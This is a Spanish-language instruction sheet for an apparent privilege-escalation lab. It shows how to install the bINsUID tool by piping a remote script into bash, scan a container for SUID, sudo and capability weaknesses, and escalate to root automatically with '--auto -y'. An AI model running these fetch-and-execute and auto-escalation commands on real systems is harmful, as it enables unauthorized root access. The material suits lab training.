================================================================================
  LABORATORIO DE ESCALADA DE PRIVILEGIOS — bINsUID
================================================================================

Objetivo: obtener root en esta máquina usando bINsUID.
La herramienta detecta el entorno, escanea SUID / capabilities / sudo,
muestra el objetivo del lab y puede escalar automáticamente.

--------------------------------------------------------------------------------
PASO 1 — Instalar (copiar y pegar una sola vez)
--------------------------------------------------------------------------------

curl -fsSL https://raw.githubusercontent.com/Cyberdark-Security/bINsUID/main/scripts/get-binsuid.sh | bash
source ~/.bashrc

(No necesitas git ni pip. Python 3 es opcional: sin él, binsuid hace recon en bash.)

¿Contenedor MÍNIMO (sin Python, sin curl, sin wget)? — hazlo desde Kali:

  # Terminal 1: ya estás en devops@breach
  # Terminal 2 en Kali (host):
  curl -fsSL https://raw.githubusercontent.com/Cyberdark-Security/bINsUID/main/scripts/binsuid-scan.sh -o /tmp/binsuid-scan.sh
  docker cp /tmp/binsuid-scan.sh breach:/tmp/binsuid-scan.sh

  # Vuelve a devops@breach:
  bash /tmp/binsuid-scan.sh --quick
  bash /tmp/binsuid-scan.sh --auto -y    # escanea y escala solo (docker, SUID, sudo)

  (Solo necesita bash + find dentro del lab. No instala nada.)

  Alternativa sin docker cp — escaneo manual mínimo en breach:
  find / -perm -4000 -type f 2>/dev/null
  sudo -l

--------------------------------------------------------------------------------
PASO 2 — Escanear (ver qué hay en el sistema)
--------------------------------------------------------------------------------

binsuid --scan-only

Modo bash (sin Python): mismo comando — escanea SUID/SGID/sudo/caps/PATH/cron/grupos.

Verás:
  - Objetivos prioritarios del lab (marcados con >>>)
  - SUID, capabilities o sudo explotables
  - Los binarios normales del sistema quedan ocultos (ruido)

--------------------------------------------------------------------------------
PASO 3 — Escalar a root
--------------------------------------------------------------------------------

Opción A — Guiado (recomendado la primera vez):

  binsuid

  La herramienta muestra el objetivo y pregunta si quieres escalar. Pulsa Y.

Opción B — Automático directo:

  binsuid --auto -y

Opción C — Solo ver el comando sin ejecutar:

  binsuid --auto --dry-run -y

--------------------------------------------------------------------------------
AVISOS NORMALES (no son errores)
--------------------------------------------------------------------------------

  getcap not found          → este lab no escanea capabilities (falta getcap)
  sudo: password required   → tu usuario no tiene sudo libre

El escaneo SUID sigue funcionando.

--------------------------------------------------------------------------------
RESUMEN RÁPIDO
--------------------------------------------------------------------------------

  Instalar:  curl -fsSL .../get-binsuid.sh | bash && source ~/.bashrc
  Escanear:  binsuid --scan-only
  Escalar:   binsuid --auto -y

================================================================================
